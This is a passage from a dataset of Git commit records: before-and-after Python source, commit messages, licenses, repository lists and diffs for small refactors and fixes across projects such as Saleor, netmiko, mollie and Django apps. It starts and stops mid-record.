placeholders_dir = r'saleor/static/placeholders/'
def add_arguments(self, parser):
parser.add_argument(
'--createsuperuser',
action='store_true',
dest='createsuperuser',
default=False,
help='Create admin account')
def handle(self, *args, **options):
for msg in create_items(self.placeholders_dir, 10):
self.stdout.write(msg)
for msg in create_users(10):
self.stdout.write(msg)
for msg in create_orders(20):
self.stdout.write(msg)
if options['createsuperuser']:
credentials = {'email': 'admin@example.com', 'password': 'admin'}
try:
User.objects.create_superuser(**credentials)
except IntegrityError:
self.stdout.write(
'Superuser already exists - %(email)s' % credentials)
else:
self.stdout.write(
'Superuser - %(email)s/%(password)s' % credentials)
|
from django.core.management.base import BaseCommand
from utils.create_random_data import create_items, create_users, create_orders
from saleor.userprofile.models import User
class Command(BaseCommand):
help = 'Populate database with test objects'
placeholders_dir = r'saleor/static/placeholders/'
def add_arguments(self, parser):
parser.add_argument(
'--createsuperuser',
action='store_true',
dest='createsuperuser',
default=False,
help='Create admin account')
def handle(self, *args, **options):
for msg in create_items(self.placeholders_dir, 10):
self.stdout.write(msg)
for msg in create_users(10):
self.stdout.write(msg)
for msg in create_orders(20):
self.stdout.write(msg)
if options['createsuperuser']:
credentials = {'email': 'admin@example.com', 'password': 'admin'}
user, created = User.objects.get_or_create(
email=credentials['email'],
is_active=True, is_staff=True, is_superuser=True)
if created:
user.set_password(credentials['password'])
user.save()
self.stdout.write(
'Superuser - %(email)s/%(password)s' % credentials)
else:
self.stdout.write(
'Superuser already exists - %(email)s' % credentials)
|
Use get_or_create instead of catching exception
|
Use get_or_create instead of catching exception
|
Python
|
bsd-3-clause
|
HyperManTT/ECommerceSaleor,car3oon/saleor,car3oon/saleor,laosunhust/saleor,spartonia/saleor,UITools/saleor,KenMutemi/saleor,tfroehlich82/saleor,tfroehlich82/saleor,car3oon/saleor,HyperManTT/ECommerceSaleor,tfroehlich82/saleor,itbabu/saleor,maferelo/saleor,laosunhust/saleor,laosunhust/saleor,laosunhust/saleor,maferelo/saleor,KenMutemi/saleor,rodrigozn/CW-Shop,rodrigozn/CW-Shop,KenMutemi/saleor,jreigel/saleor,maferelo/saleor,rchav/vinerack,itbabu/saleor,jreigel/saleor,mociepka/saleor,rchav/vinerack,spartonia/saleor,jreigel/saleor,HyperManTT/ECommerceSaleor,rodrigozn/CW-Shop,mociepka/saleor,spartonia/saleor,mociepka/saleor,rchav/vinerack,itbabu/saleor,UITools/saleor,UITools/saleor,spartonia/saleor,UITools/saleor,UITools/saleor
|
---
+++
@@ -1,5 +1,4 @@
from django.core.management.base import BaseCommand
-from django.db import IntegrityError
from utils.create_random_data import create_items, create_users, create_orders
@@ -28,11 +27,14 @@
if options['createsuperuser']:
credentials = {'email': 'admin@example.com', 'password': 'admin'}
- try:
- User.objects.create_superuser(**credentials)
- except IntegrityError:
+ user, created = User.objects.get_or_create(
+ email=credentials['email'],
+ is_active=True, is_staff=True, is_superuser=True)
+ if created:
+ user.set_password(credentials['password'])
+ user.save()
+ self.stdout.write(
+ 'Superuser - %(email)s/%(password)s' % credentials)
+ else:
self.stdout.write(
'Superuser already exists - %(email)s' % credentials)
- else:
- self.stdout.write(
- 'Superuser - %(email)s/%(password)s' % credentials)
|
f5baf5aab4570f54e686ecf6c69f5100bf077d8b
|
openstack_dashboard/fiware_oauth2/urls.py
|
openstack_dashboard/fiware_oauth2/urls.py
|
# Copyright (C) 2014 Universidad Politecnica de Madrid
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from django.conf.urls import patterns
from django.conf.urls import url
from openstack_dashboard.fiware_oauth2 import views
# NOTE(garcianavalon) following
# https://github.com/ging/fi-ware-idm/wiki/Using-the-FI-LAB-instance
urlpatterns = patterns(
'fiware_oauth2.views',
url(r"^oauth2/authorize/$", views.AuthorizeView.as_view(),
name='fiware_oauth2_authorize'),
url(r"^oauth2/authorize/cancel/$", views.cancel_authorize,
name='fiware_oauth2_cancel_authorize'),
url(r"^oauth2/token$", views.AccessTokenView.as_view(),
name='fiware_oauth2_access_token'),
url(r"^user", views.UserInfoView.as_view(),
name='fiware_oauth2_user_info'),
)
|
# Copyright (C) 2014 Universidad Politecnica de Madrid
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from django.conf.urls import patterns
from django.conf.urls import url
from openstack_dashboard.fiware_oauth2 import views
# NOTE(garcianavalon) following
# https://github.com/ging/fi-ware-idm/wiki/Using-the-FI-LAB-instance
urlpatterns = patterns(
'fiware_oauth2.views',
url(r"^oauth2/authorize/$", views.AuthorizeView.as_view(),
name='fiware_oauth2_authorize'),
url(r"^oauth2/authorize/cancel/$", views.cancel_authorize,
name='fiware_oauth2_cancel_authorize'),
url(r"^oauth2/token$", views.AccessTokenView.as_view(),
name='fiware_oauth2_access_token'),
url(r"^user$", views.UserInfoView.as_view(),
name='fiware_oauth2_user_info'),
)
|
Fix URL pattern for validating OAuth2 tokens
|
Fix URL pattern for validating OAuth2 tokens
|
Python
|
apache-2.0
|
ging/horizon,ging/horizon,ging/horizon,ging/horizon
|
---
+++
@@ -29,6 +29,6 @@
name='fiware_oauth2_cancel_authorize'),
url(r"^oauth2/token$", views.AccessTokenView.as_view(),
name='fiware_oauth2_access_token'),
- url(r"^user", views.UserInfoView.as_view(),
+ url(r"^user$", views.UserInfoView.as_view(),
name='fiware_oauth2_user_info'),
)
|
8562a58501aaa3f53a6aef5a0c1fab60aafb7c61
|
scuole/states/models.py
|
scuole/states/models.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from localflavor.us.models import USStateField
from django.contrib.gis.db import models
from django.utils.encoding import python_2_unicode_compatible
from scuole.core.models import PersonnelBase
from scuole.stats.models import SchoolYear, StatsBase
from django.utils.translation import ugettext_lazy as _
@python_2_unicode_compatible
class State(models.Model):
name = USStateField(_('State name'))
slug = models.SlugField()
shape = models.MultiPolygonField(_('State shape'), srid=4326, null=True)
objects = models.GeoManager()
def __str__(self):
return self.name
@python_2_unicode_compatible
class StateStats(StatsBase):
state = models.ForeignKey(State, related_name='stats')
year = models.ForeignKey(SchoolYear, related_name='state_stats')
class Meta:
unique_together = ('state', 'year',)
verbose_name_plural = _('State stats')
def __str__(self):
return '{0} {1}'.format(self.year.name, self.state.name)
@python_2_unicode_compatible
class Commissioner(PersonnelBase):
state = models.OneToOneField(State, related_name='commissioner_of')
def __str__(self):
return 'Texas Education Commissioner'
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from localflavor.us.models import USStateField
from django.contrib.gis.db import models
from django.utils.encoding import python_2_unicode_compatible
from scuole.core.models import PersonnelBase
from scuole.stats.models import SchoolYear, StatsBase
from django.utils.translation import ugettext_lazy as _
@python_2_unicode_compatible
class State(models.Model):
name = USStateField(_('State name'))
slug = models.SlugField()
shape = models.MultiPolygonField(_('State shape'), srid=4326, null=True)
objects = models.GeoManager()
def __str__(self):
return self.name
def get_absolute_url(self):
from django.core.urlresolvers import reverse
return reverse('states:detail', kwargs={
'slug': self.slug,
})
@python_2_unicode_compatible
class StateStats(StatsBase):
state = models.ForeignKey(State, related_name='stats')
year = models.ForeignKey(SchoolYear, related_name='state_stats')
class Meta:
unique_together = ('state', 'year',)
verbose_name_plural = _('State stats')
def __str__(self):
return '{0} {1}'.format(self.year.name, self.state.name)
@python_2_unicode_compatible
class Commissioner(PersonnelBase):
state = models.OneToOneField(State, related_name='commissioner_of')
def __str__(self):
return 'Texas Education Commissioner'
|
Add get_absolute_url to State model
|
Add get_absolute_url to State model
|
Python
|
mit
|
texastribune/scuole,texastribune/scuole,texastribune/scuole,texastribune/scuole
|
---
+++
@@ -21,6 +21,12 @@
def __str__(self):
return self.name
+ def get_absolute_url(self):
+ from django.core.urlresolvers import reverse
+ return reverse('states:detail', kwargs={
+ 'slug': self.slug,
+ })
+
@python_2_unicode_compatible
class StateStats(StatsBase):
|
570a4911f0babf884fa57b4509957bd94fc790ed
|
moita/pipelines.py
|
moita/pipelines.py
|
# -*- coding: utf-8 -*-
import json
from collections import defaultdict
from datetime import datetime
from unidecode import unidecode
from .items import Subject
from .spiders.cagr import SEMESTER
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
def classes(item: Subject):
for klass in item['classes']:
yield [klass['id'], item['hours'], klass['vacancy'], klass['occupied'],
klass['special'], klass['remaining'], klass['lacking'],
klass['raw_timetable'], klass['teachers']]
del klass['raw_timetable']
class LegacyPipeline(object):
data = defaultdict(list)
time_format = '{}.{}-{} / {}'
def open_spider(self, spider):
self.data['DATA'] = datetime.now().strftime('%d/%m/%y - %H:%M')
def process_item(self, item: Subject, spider):
norm = unidecode(item['name']).upper()
subject = [item['id'], norm, item['name'], list(classes(item))]
self.data[item['campus']].append(subject)
return item
def close_spider(self, spider):
with open('{}.json'.format(SEMESTER), 'w') as fp:
json.dump(self.data, fp, ensure_ascii=False, separators=(',', ':',))
|
# -*- coding: utf-8 -*-
import json
from collections import defaultdict
from datetime import datetime
from unidecode import unidecode
from .items import Subject
from .spiders.cagr import SEMESTER
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
def classes(item: Subject):
for klass in item['classes']:
yield [klass['id'], item['hours'], klass['vacancy'], klass['occupied'],
klass['special'], klass['remaining'], klass['lacking'],
klass['raw_timetable'], klass['teachers']]
del klass['raw_timetable']
class LegacyPipeline(object):
data = defaultdict(list)
time_format = '{}.{}-{} / {}'
def process_item(self, item: Subject, spider):
norm = unidecode(item['name']).upper()
subject = [item['id'], norm, item['name'], list(classes(item))]
self.data[item['campus']].append(subject)
return item
def close_spider(self, spider):
self.data['DATA'] = datetime.now().strftime('%d/%m/%y - %H:%M')
with open('{}.json'.format(SEMESTER), 'w') as fp:
json.dump(self.data, fp, ensure_ascii=False, separators=(',', ':',))
|
Add date at the end
|
Add date at the end
|
Python
|
mit
|
ranisalt/moita-ufsc-crawler
|
---
+++
@@ -25,9 +25,6 @@
data = defaultdict(list)
time_format = '{}.{}-{} / {}'
- def open_spider(self, spider):
- self.data['DATA'] = datetime.now().strftime('%d/%m/%y - %H:%M')
-
def process_item(self, item: Subject, spider):
norm = unidecode(item['name']).upper()
subject = [item['id'], norm, item['name'], list(classes(item))]
@@ -35,5 +32,6 @@
return item
def close_spider(self, spider):
+ self.data['DATA'] = datetime.now().strftime('%d/%m/%y - %H:%M')
with open('{}.json'.format(SEMESTER), 'w') as fp:
json.dump(self.data, fp, ensure_ascii=False, separators=(',', ':',))
|
85be415a27d23951f5ee943710ea3d22571aa697
|
mollie/api/objects/list.py
|
mollie/api/objects/list.py
|
from .base import Base
class List(Base):
current = None
def __init__(self, result, object_type):
Base.__init__(self, result)
self.object_type = object_type
def get_object_name(self):
return self.object_type.__name__.lower() + 's'
def __iter__(self):
"""Implement iterator logic."""
self.current = None
return self
def __next__(self):
"""Implement iterator logic."""
if self.current is None:
self.current = 0
else:
self.current += 1
try:
item = self['_embedded'][self.get_object_name()][self.current]
return self.object_type(item)
except IndexError:
raise StopIteration
@property
def count(self):
if 'count' not in self:
return None
return int(self['count'])
def get_offset(self):
if 'offset' not in self:
return None
return self['offset']
|
from .base import Base
class List(Base):
current = None
def __init__(self, result, object_type):
Base.__init__(self, result)
self.object_type = object_type
def get_object_name(self):
return self.object_type.__name__.lower() + 's'
def __iter__(self):
"""Implement iterator logic."""
self.current = None
return self
def __next__(self):
"""Implement iterator logic."""
if self.current is None:
self.current = 0
else:
self.current += 1
try:
item = self['_embedded'][self.get_object_name()][self.current]
return self.object_type(item)
except IndexError:
raise StopIteration
next = __next__ # support python2 iterator interface
@property
def count(self):
if 'count' not in self:
return None
return int(self['count'])
def get_offset(self):
if 'offset' not in self:
return None
return self['offset']
|
Add proxy method for python2 iterator support
|
Add proxy method for python2 iterator support
|
Python
|
bsd-2-clause
|
mollie/mollie-api-python
|
---
+++
@@ -28,6 +28,8 @@
except IndexError:
raise StopIteration
+ next = __next__ # support python2 iterator interface
+
@property
def count(self):
if 'count' not in self:
|
1994a59d3ae9d3f24445f11f3bc0dd3089042bc4
|
main.py
|
main.py
|
from order import Order
from orderbook import OrderBook
from client import FinanceClient
from ordermanager import OrderManager
from strategy import Vanilla, Strawberry
import sys
# local server for finance data
host_ip, server_port = "localhost", 9995
def main():
"""
Turn on the FinanceServer
- fetch data from the FinanceServer
- parse out each order as an Order object
- add these Orders to the OrderBook using the values in Action
- for each added order, decide to trade indicated by signal
"""
strategy_choice = sys.argv[1]
books = {}
client = FinanceClient(host_ip, server_port)
ordermanager = OrderManager()
if strategy_choice == 'Vanilla':
strategy = Vanilla()
elif strategy_choice == 'Strawberry':
strategy = Strawberry()
else:
print('strategies available: Vanilla or Strawberry')
print(strategy.name, strategy.description)
for line in client.fetch():
try:
order = Order(line)
book = books.get(order.symbol)
if book is None:
book = books[order.symbol] = OrderBook(order.symbol)
book.add(order)
bid, offer = book.display_book(output=True)
ordermanager.signal(bid, offer, strategy.execute)
except Exception as e:
print(e)
pass
if __name__ == '__main__':
main()
|
from order import Order
from orderbook import OrderBook
from client import FinanceClient
from ordermanager import OrderManager
from strategy import Vanilla, Strawberry
import sys
# local server for finance data
host_ip, server_port = "localhost", 9995
def main():
"""
Turn on the FinanceServer
- fetch data from the FinanceServer
- parse out each order as an Order object
- add these Orders to the OrderBook using the values in Action
- for each added order, decide to trade indicated by signal
"""
strategy_choice = sys.argv[1]
books = {}
client = FinanceClient(host_ip, server_port)
ordermanager = OrderManager()
if strategy_choice == 'Vanilla':
strategy = Vanilla()
elif strategy_choice == 'Strawberry':
strategy = Strawberry()
else:
print('strategies available: Vanilla or Strawberry')
print(strategy.name, strategy.description)
for line in client.fetch():
try:
order = Order(line)
book = books.get(order.symbol)
if book is None:
book = books[order.symbol] = OrderBook(order.symbol)
if order.action == 'A':
book.add(order)
elif order.side == 'M':
book.modify(order)
bid, offer = book.display_book(output=True)
ordermanager.signal(bid, offer, strategy.execute)
except Exception as e:
print(e)
pass
if __name__ == '__main__':
main()
|
Use modify with the orderbook
|
Use modify with the orderbook
|
Python
|
mit
|
albhu/finance
|
---
+++
@@ -27,7 +27,7 @@
strategy = Strawberry()
else:
print('strategies available: Vanilla or Strawberry')
-
+
print(strategy.name, strategy.description)
for line in client.fetch():
@@ -36,7 +36,10 @@
book = books.get(order.symbol)
if book is None:
book = books[order.symbol] = OrderBook(order.symbol)
- book.add(order)
+ if order.action == 'A':
+ book.add(order)
+ elif order.side == 'M':
+ book.modify(order)
bid, offer = book.display_book(output=True)
ordermanager.signal(bid, offer, strategy.execute)
|
67ea74ac57712ba963530845b566c62d7c5307dc
|
recaptcha_comments/forms.py
|
recaptcha_comments/forms.py
|
from django.contrib.comments.forms import CommentForm
from recaptcha_comments.fields import RecaptchaField
class RecaptchaCommentForm(CommentForm):
captcha = RecaptchaField()
def clean_captcha(self):
if not 'preview' in self.data:
captcha_data = self.cleaned_data['captcha']
return self.fields['captcha'].verify(captcha_data)
|
from django.contrib.comments.forms import CommentForm
from recaptcha_comments.fields import RecaptchaField
class RecaptchaCommentForm(CommentForm):
captcha = RecaptchaField()
def clean_captcha(self):
if not 'preview' in self.data:
captcha_data = self.cleaned_data['captcha']
return self.fields['captcha'].verify(captcha_data)
return self.cleaned_data['captcha']
|
Fix a flow issue (long standing bug)
|
Fix a flow issue (long standing bug)
|
Python
|
mit
|
theju/django-comments-apps
|
---
+++
@@ -8,3 +8,4 @@
if not 'preview' in self.data:
captcha_data = self.cleaned_data['captcha']
return self.fields['captcha'].verify(captcha_data)
+ return self.cleaned_data['captcha']
|
01a012bf37c438c845e4962ffa6f1c0e1e2723f4
|
netmiko/cisco/cisco_ios.py
|
netmiko/cisco/cisco_ios.py
|
from __future__ import unicode_literals
from netmiko.cisco_base_connection import CiscoSSHConnection
from netmiko.cisco_base_connection import CiscoTelnetConnection
class CiscoIosSSH(CiscoSSHConnection):
"""Cisco IOS SSH driver."""
def session_preparation(self):
"""Prepare the session after the connection has been established."""
self.set_base_prompt()
self.disable_paging()
self.set_terminal_width(command='terminal width 511')
class CiscoIosTelnet(CiscoTelnetConnection):
"""Cisco IOS Telnet driver."""
def session_preparation(self):
"""Prepare the session after the connection has been established."""
self.set_base_prompt()
self.disable_paging()
self.set_terminal_width(command='terminal width 511')
|
from __future__ import unicode_literals
from netmiko.cisco_base_connection import CiscoSSHConnection
from netmiko.cisco_base_connection import CiscoTelnetConnection
class CiscoIosSSH(CiscoSSHConnection):
"""Cisco IOS SSH driver."""
@staticmethod
def autodetect(session):
"""
"""
matches = ["Cisco IOS Software", "Cisco Internetwork Operating System Software"]
try:
response = session.send_command("show version | inc Cisco")
for m in matches:
if m in response:
return 99
except:
return 0
return 0
def session_preparation(self):
"""Prepare the session after the connection has been established."""
self.set_base_prompt()
self.disable_paging()
self.set_terminal_width(command='terminal width 511')
class CiscoIosTelnet(CiscoTelnetConnection):
"""Cisco IOS Telnet driver."""
def session_preparation(self):
"""Prepare the session after the connection has been established."""
self.set_base_prompt()
self.disable_paging()
self.set_terminal_width(command='terminal width 511')
|
Add autodetect for Cisco IOS
|
Add autodetect for Cisco IOS
|
Python
|
mit
|
fooelisa/netmiko,ktbyers/netmiko,ktbyers/netmiko,isidroamv/netmiko,isidroamv/netmiko,fooelisa/netmiko
|
---
+++
@@ -6,6 +6,21 @@
class CiscoIosSSH(CiscoSSHConnection):
"""Cisco IOS SSH driver."""
+
+ @staticmethod
+ def autodetect(session):
+ """
+ """
+ matches = ["Cisco IOS Software", "Cisco Internetwork Operating System Software"]
+ try:
+ response = session.send_command("show version | inc Cisco")
+ for m in matches:
+ if m in response:
+ return 99
+ except:
+ return 0
+ return 0
+
def session_preparation(self):
"""Prepare the session after the connection has been established."""
self.set_base_prompt()
|
424f6c8c1c4b65e04196a568cfe56b77265aa063
|
kobo/apps/external_integrations/models.py
|
kobo/apps/external_integrations/models.py
|
# coding: utf-8
from django.db import models
from django.utils.translation import ugettext_lazy as _
def _set_cors_field_options(name, bases, attrs):
cls = type(name, bases, attrs)
# The `cors` field is already defined by `AbstractCorsModel`, but let's
# help folks out by giving it a more descriptive name and help text, which
# will both appear in the admin interface
cors_field = cls._meta.get_field('cors')
cors_field.verbose_name = _('allowed origin')
cors_field.help_text = _('You must include scheme (http:// or https://)')
return cls
class CorsModel(models.Model, metaclass=_set_cors_field_options):
"""
A model with one field, `cors`, which specifies an allowed origin that must
exactly match the host with its scheme. e.g. https://example.com
"""
cors = models.CharField(max_length=255)
def __str__(self):
return self.cors
class Meta:
verbose_name = _('allowed CORS origin')
|
# coding: utf-8
from django.db import models
from django.utils.translation import ugettext_lazy as _
class CorsModel(models.Model):
"""
A model with one field, `cors`, which specifies an allowed origin that must
exactly match `request.META.get('HTTP_ORIGIN')`
"""
cors = models.CharField(
max_length=255,
verbose_name=_('allowed origin'),
help_text=_(
'Must contain exactly the URI scheme, host, and port, e.g. '
'https://example.com:1234. Standard ports (80 for http and 443 '
'for https) may be omitted.'
)
)
def __str__(self):
return self.cors
class Meta:
verbose_name = _('allowed CORS origin')
|
Simplify CORS model and improve wording
|
Simplify CORS model and improve wording
|
Python
|
agpl-3.0
|
kobotoolbox/kpi,kobotoolbox/kpi,kobotoolbox/kpi,kobotoolbox/kpi,kobotoolbox/kpi
|
---
+++
@@ -3,24 +3,21 @@
from django.utils.translation import ugettext_lazy as _
-def _set_cors_field_options(name, bases, attrs):
- cls = type(name, bases, attrs)
- # The `cors` field is already defined by `AbstractCorsModel`, but let's
- # help folks out by giving it a more descriptive name and help text, which
- # will both appear in the admin interface
- cors_field = cls._meta.get_field('cors')
- cors_field.verbose_name = _('allowed origin')
- cors_field.help_text = _('You must include scheme (http:// or https://)')
- return cls
-
-
-class CorsModel(models.Model, metaclass=_set_cors_field_options):
+class CorsModel(models.Model):
"""
A model with one field, `cors`, which specifies an allowed origin that must
- exactly match the host with its scheme. e.g. https://example.com
+ exactly match `request.META.get('HTTP_ORIGIN')`
"""
- cors = models.CharField(max_length=255)
+ cors = models.CharField(
+ max_length=255,
+ verbose_name=_('allowed origin'),
+ help_text=_(
+ 'Must contain exactly the URI scheme, host, and port, e.g. '
+ 'https://example.com:1234. Standard ports (80 for http and 443 '
+ 'for https) may be omitted.'
+ )
+ )
def __str__(self):
return self.cors
|
d27ded9fb8c833b2f21fedade5cbef9ab831453e
|
src/ggrc/models/hooks/comment.py
|
src/ggrc/models/hooks/comment.py
|
# Copyright (C) 2016 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""A module with Comment object creation hooks"""
from ggrc import db
from ggrc.login import get_current_user_id
from ggrc.models.all_models import Comment, ObjectOwner
from ggrc.services.common import Resource
def init_hook():
"""Initialize all hooks"""
# pylint: disable=unused-variable
@Resource.model_posted_after_commit.connect_via(Comment)
def handle_comment_post(sender, obj=None, src=None, service=None):
"""Save information on which user created the Comment object
Args:
sender: the class of the object that initiated the server request
obj: the instance of `sender` that initiated the server request
src: a dictionary containing the POST data sent with request
service: the server-side API service that handled the request
Returns:
None
"""
# pylint: disable=unused-argument
creator_id = get_current_user_id()
obj_owner = ObjectOwner(
person_id=creator_id,
ownable_id=obj.id,
ownable_type=obj.type,
)
db.session.add(obj_owner)
|
# Copyright (C) 2016 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""A module with Comment object creation hooks"""
from ggrc import db
from ggrc.login import get_current_user_id
from ggrc.models.all_models import Comment, ObjectOwner
from ggrc.services.common import Resource
def init_hook():
"""Initialize all hooks"""
# pylint: disable=unused-variable
@Resource.collection_posted.connect_via(Comment)
def handle_comment_post(sender, objects=None, **kwargs):
"""Save information on which user created the Comment object."""
# pylint: disable=unused-argument
creator_id = get_current_user_id()
for obj in objects:
obj_owner = ObjectOwner(
person_id=creator_id,
ownable_id=obj.id,
ownable_type=obj.type,
)
db.session.add(obj_owner)
|
Fix creating revisions of ObjectOwner of Comment
|
Fix creating revisions of ObjectOwner of Comment
|
Python
|
apache-2.0
|
josthkko/ggrc-core,AleksNeStu/ggrc-core,andrei-karalionak/ggrc-core,kr41/ggrc-core,j0gurt/ggrc-core,kr41/ggrc-core,selahssea/ggrc-core,plamut/ggrc-core,j0gurt/ggrc-core,kr41/ggrc-core,plamut/ggrc-core,selahssea/ggrc-core,j0gurt/ggrc-core,AleksNeStu/ggrc-core,josthkko/ggrc-core,AleksNeStu/ggrc-core,josthkko/ggrc-core,j0gurt/ggrc-core,selahssea/ggrc-core,kr41/ggrc-core,VinnieJohns/ggrc-core,andrei-karalionak/ggrc-core,andrei-karalionak/ggrc-core,VinnieJohns/ggrc-core,plamut/ggrc-core,AleksNeStu/ggrc-core,andrei-karalionak/ggrc-core,josthkko/ggrc-core,selahssea/ggrc-core,plamut/ggrc-core,VinnieJohns/ggrc-core,VinnieJohns/ggrc-core
|
---
+++
@@ -11,28 +11,17 @@
def init_hook():
"""Initialize all hooks"""
+ # pylint: disable=unused-variable
- # pylint: disable=unused-variable
- @Resource.model_posted_after_commit.connect_via(Comment)
- def handle_comment_post(sender, obj=None, src=None, service=None):
- """Save information on which user created the Comment object
-
- Args:
- sender: the class of the object that initiated the server request
- obj: the instance of `sender` that initiated the server request
- src: a dictionary containing the POST data sent with request
- service: the server-side API service that handled the request
- Returns:
- None
- """
+ @Resource.collection_posted.connect_via(Comment)
+ def handle_comment_post(sender, objects=None, **kwargs):
+ """Save information on which user created the Comment object."""
# pylint: disable=unused-argument
-
creator_id = get_current_user_id()
-
- obj_owner = ObjectOwner(
- person_id=creator_id,
- ownable_id=obj.id,
- ownable_type=obj.type,
- )
-
- db.session.add(obj_owner)
+ for obj in objects:
+ obj_owner = ObjectOwner(
+ person_id=creator_id,
+ ownable_id=obj.id,
+ ownable_type=obj.type,
+ )
+ db.session.add(obj_owner)
|
c20482f8c9c20b4d934e16a583697e2f8f520553
|
yesimeanit/showoff/newsletter_subscriptions/forms.py
|
yesimeanit/showoff/newsletter_subscriptions/forms.py
|
from django import forms
from django.utils.translation import ugettext_lazy as _
from .models import NewsletterSubscription
class SubscribtionForm(forms.ModelForm):
class Meta:
model = NewsletterSubscription
fields = ('salutation', 'first_name', 'last_name', 'email')
def clean_email(self):
email = self.cleaned_data.get('email')
if email and NewsletterSubscription.objects.active().filter(email=email).count():
raise forms.ValidationError(_('This e-mail address already has an active subscription.'))
return email
class UnsubscriptionForm(forms.ModelForm):
class Meta:
model = NewsletterSubscription
fields = ('email',)
|
from django import forms
from django.utils.translation import ugettext_lazy as _
from .models import NewsletterSubscription
class SubscribtionForm(forms.ModelForm):
salutation = forms.ChoiceField(choices=NewsletterSubscription.SALUTATION_CHOICES,
required=False, label=_('salutation'), widget=forms.RadioSelect)
class Meta:
model = NewsletterSubscription
fields = ('salutation', 'first_name', 'last_name', 'email')
def clean_email(self):
email = self.cleaned_data.get('email')
if email and NewsletterSubscription.objects.active().filter(email=email).count():
raise forms.ValidationError(_('This e-mail address already has an active subscription.'))
return email
class UnsubscriptionForm(forms.ModelForm):
class Meta:
model = NewsletterSubscription
fields = ('email',)
|
Customize salutation form field a bit
|
Customize salutation form field a bit
|
Python
|
bsd-3-clause
|
guetux/django-yesimeanit
|
---
+++
@@ -5,6 +5,9 @@
class SubscribtionForm(forms.ModelForm):
+ salutation = forms.ChoiceField(choices=NewsletterSubscription.SALUTATION_CHOICES,
+ required=False, label=_('salutation'), widget=forms.RadioSelect)
+
class Meta:
model = NewsletterSubscription
fields = ('salutation', 'first_name', 'last_name', 'email')
|
dcf0ee630a20b413d2212c3d3ae19ce4008a33fe
|
openacademy/model/openacademy_course.py
|
openacademy/model/openacademy_course.py
|
from openerp import models, fields
'''
This module create module of Courso
'''
class Course(models.Model):
'''
This class create module of Course
'''
_name = 'openacademy.course' # Model odoo name
name = fields.Char(string='Title', required=True) # Field reserved to identified name rec
description = fields.Text(string='Description')
responsible_id = fields.Many2one('res.users',
ondelete='set null', string="Responsible", index=True)
session_ids = fields.One2many(
'openacademy.session', 'course_id', string="Sessions")
_sql_constraints = [
('name_description_check',
'CHECK(name != description)',
"The title of the course should not be the description"),
('name_unique',
'UNIQUE(name)',
"The course title must be unique"),
]
|
from openerp import api, models, fields
'''
This module create module of Courso
'''
class Course(models.Model):
'''
This class create module of Course
'''
_name = 'openacademy.course' # Model odoo name
name = fields.Char(string='Title', required=True) # Field reserved to identified name rec
description = fields.Text(string='Description')
responsible_id = fields.Many2one('res.users',
ondelete='set null', string="Responsible", index=True)
session_ids = fields.One2many(
'openacademy.session', 'course_id', string="Sessions")
_sql_constraints = [
('name_description_check',
'CHECK(name != description)',
"The title of the course should not be the description"),
('name_unique',
'UNIQUE(name)',
"The course title must be unique"),
]
@api.one
def copy(self, default=None):
default = dict(default or {})
copied_count = self.search_count(
[('name', '=like', u"Copy of {}%".format(self.name))])
if not copied_count:
new_name = u"Copy of {}".format(self.name)
else:
new_name = u"Copy of {} ({})".format(self.name, copied_count)
default['name'] = new_name
return super(Course, self).copy(default)
|
Modify copy method into inherit
|
[REF] openacademy: Modify copy method into inherit
|
Python
|
apache-2.0
|
Hiregui92/openacademy-project
|
---
+++
@@ -1,4 +1,4 @@
-from openerp import models, fields
+from openerp import api, models, fields
'''
This module create module of Courso
@@ -28,3 +28,17 @@
'UNIQUE(name)',
"The course title must be unique"),
]
+
+ @api.one
+ def copy(self, default=None):
+ default = dict(default or {})
+
+ copied_count = self.search_count(
+ [('name', '=like', u"Copy of {}%".format(self.name))])
+ if not copied_count:
+ new_name = u"Copy of {}".format(self.name)
+ else:
+ new_name = u"Copy of {} ({})".format(self.name, copied_count)
+
+ default['name'] = new_name
+ return super(Course, self).copy(default)
|
9f97f232a23dab38736e487bd69377b977dff752
|
candidates/tests/test_feeds.py
|
candidates/tests/test_feeds.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django_webtest import WebTest
from .auth import TestUserMixin
from ..models import LoggedAction
class TestFeeds(TestUserMixin, WebTest):
def setUp(self):
self.action1 = LoggedAction.objects.create(
user=self.user,
action_type='person-create',
ip_address='127.0.0.1',
person_id='9876',
popit_person_new_version='1234567890abcdef',
source='Just for tests...',
)
self.action2 = LoggedAction.objects.create(
user=self.user,
action_type='candidacy-delete',
ip_address='127.0.0.1',
person_id='1234',
popit_person_new_version='987654321',
source='Something with unicode in it…',
)
def test_unicode(self):
response = self.app.get('/feeds/changes.xml')
self.assertTrue("Just for tests..." in response)
self.assertTrue("Something with unicode in it…" in response)
def tearDown(self):
self.action2.delete()
self.action1.delete()
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django_webtest import WebTest
from popolo.models import Person
from .auth import TestUserMixin
from ..models import LoggedAction
class TestFeeds(TestUserMixin, WebTest):
def setUp(self):
self.person1 = Person.objects.create(
name='Test Person1'
)
self.person2 = Person.objects.create(
name='Test Person2'
)
self.action1 = LoggedAction.objects.create(
user=self.user,
action_type='person-create',
ip_address='127.0.0.1',
person=self.person1,
popit_person_new_version='1234567890abcdef',
